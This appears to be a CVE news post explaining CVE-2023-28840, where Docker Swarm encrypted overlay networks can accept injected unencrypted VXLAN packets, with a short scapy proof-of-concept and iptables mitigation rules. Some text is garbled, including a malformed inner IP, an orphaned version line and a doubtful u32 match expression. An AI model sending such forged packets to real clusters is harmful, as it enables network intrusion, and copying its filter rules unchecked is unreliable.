CVE CyberSecurity Database News

CVE-2023-28840 - Insecure docker overlay encryption allows bypassing IPSec protections in Moby and Docker Swarm

Poster -

Published: 2023-04-14

What is CVE-2023-28840?

CVE-2023-28840 is a serious security vulnerability in Moby (the open-source core of Docker) and its downstreams including Docker and Mirantis Container Runtime.  
It affects the encrypted overlay networks used in Docker Swarm’s built-in container orchestrator.

This post will walk you through what happened, how it can be exploited, and what you need to do to secure your clusters.

Background: Moby, Swarm, and Overlay Networks

Moby is the core software behind Docker and other container products.  
Inside Moby, the dockerd daemon powers “Swarm Mode,” a simple orchestrator for running containers across many servers. Swarm lets you create overlay networks to securely connect containers and services, even across different machines.

Normally, these overlay networks use VXLAN (a kind of virtual network that encapsulates Ethernet frames in UDP packets) to send container traffic between nodes.  
For extra security, encrypted overlay networks can be enabled, wrapping that VXLAN traffic inside IPsec encryption and authentication.

Authentication, integrity, and confidentiality are handled with IPsec. But relying on iptables rules to distinguish legitimate, encrypted traffic and block unencrypted packets is a weak link, which is where CVE-2023-28840 comes in.

How does the vulnerability work?

When a Swarm node joins an encrypted overlay network, Docker/Moby attempts to install iptables rules to block unencrypted VXLAN network packets for that overlay.  
Those rules look at the VXLAN Network ID (VNI) to know which packets are meant for an encrypted overlay. They depend on the xt_u32 kernel module to match specific bytes in the packet.

Here’s a simplified code snippet of how it should filter malicious VXLAN packets

# Only accept VXLAN traffic with the right VNI and with IPsec encryption:

iptables -A INPUT -p udp --dport 4789 -m u32 --u32 ">>22&x3C@8=xNNNNNN" -j DROP
# ^^^
# NNNNNN = VXLAN VNI bytes, filters for the overlay network in question

But here’s the key issue:  
Docker adds these security rules at the end of the INPUT chain. Any rules a system administrator set up before will take precedence.

If an admin has firewall rules that accept incoming UDP:4789 or don’t drop unencrypted VXLAN traffic before these overlay rules, an attacker *can* inject raw VXLAN packets—even if you thought your overlay was encrypted.

Network escalation: Possibly open connections that should be blocked, or sniff traffic.

Worse: If xt_u32 isn’t loaded or available, Docker can’t set any of these filtering rules, leaving you open to attack by default.

Example Exploit: Packet Injection

Assume attacker A knows that a Docker Swarm cluster is running on public IP addresses, with one overlay network in “encrypted” mode using default VXLAN port (UDP 4789), VNI 512.  
Attacker can craft a VXLAN packet targeting VNI 512 and send it directly to a node. If the iptables rules are bypassed, the unencrypted packet could be delivered into the overlay network stack.

Here’s a proof-of-concept using scapy in Python to craft such a packet

from scapy.all import *

vxlan_vni = 512  # Adjust as needed
dst_ip = "198.51.100.2"  # Target Swarm node's public IP

# Build VXLAN header; VNI is 24 bits, so shift 8 left to set in header
vxlan_hdr = VXLAN(vni=vxlan_vni)
inner_pkt = Ether()/IP(dst="10...10")/TCP(dport=808, sport=12345)/Raw(b'Exploit')

# Encapsulate and send
pkt = IP(dst=dst_ip)/UDP(dport=4789)/vxlan_hdr/inner_pkt

send(pkt)

This forged packet can be routed through the Swarm overlay, and might be accepted by a service listening on that overlay network.

20.10.16 and higher

Check with  

docker version


to see which you are running.

- Moby Advisory (GHSA-8h86-px9c-j6qf)
- CVE entry at NIST
- Mirantis security page

If you can't patch immediately

1. Block inbound UDP 4789 at the perimeter firewall. Don’t let Internet traffic hit your Swarm nodes’ VXLAN port.
2. Make sure xt_u32 kernel module is enabled on all Swarm nodes, so Docker can set up those iptables rules.

Example quick rule (replace NNN with actual VNI)

iptables -I INPUT 1 -p udp --dport 4789 -m u32 --u32 ">>22&x3C@8=xNNNNNN" -j DROP

Conclusion (tl;dr)

Even encrypted Swarm overlay networks can be vulnerable to raw VXLAN packet injection if network filtering is not set up strictly enough, or if the Docker/Moby iptables rules are overridden.  
All users should upgrade to patched releases immediately or apply strong network restrictions and kernel module enforcement.

More resources

- Moby Overlay Networks docs
- Swarm encrypted overlay networks
- VXLAN explained (wikipedia)

If you found this useful, share and let others know about CVE-2023-28840!

Timeline

Published on: 04/04/2023 22:15:00 UTC
Last modified on: 04/14/2023 15:23:00 UTC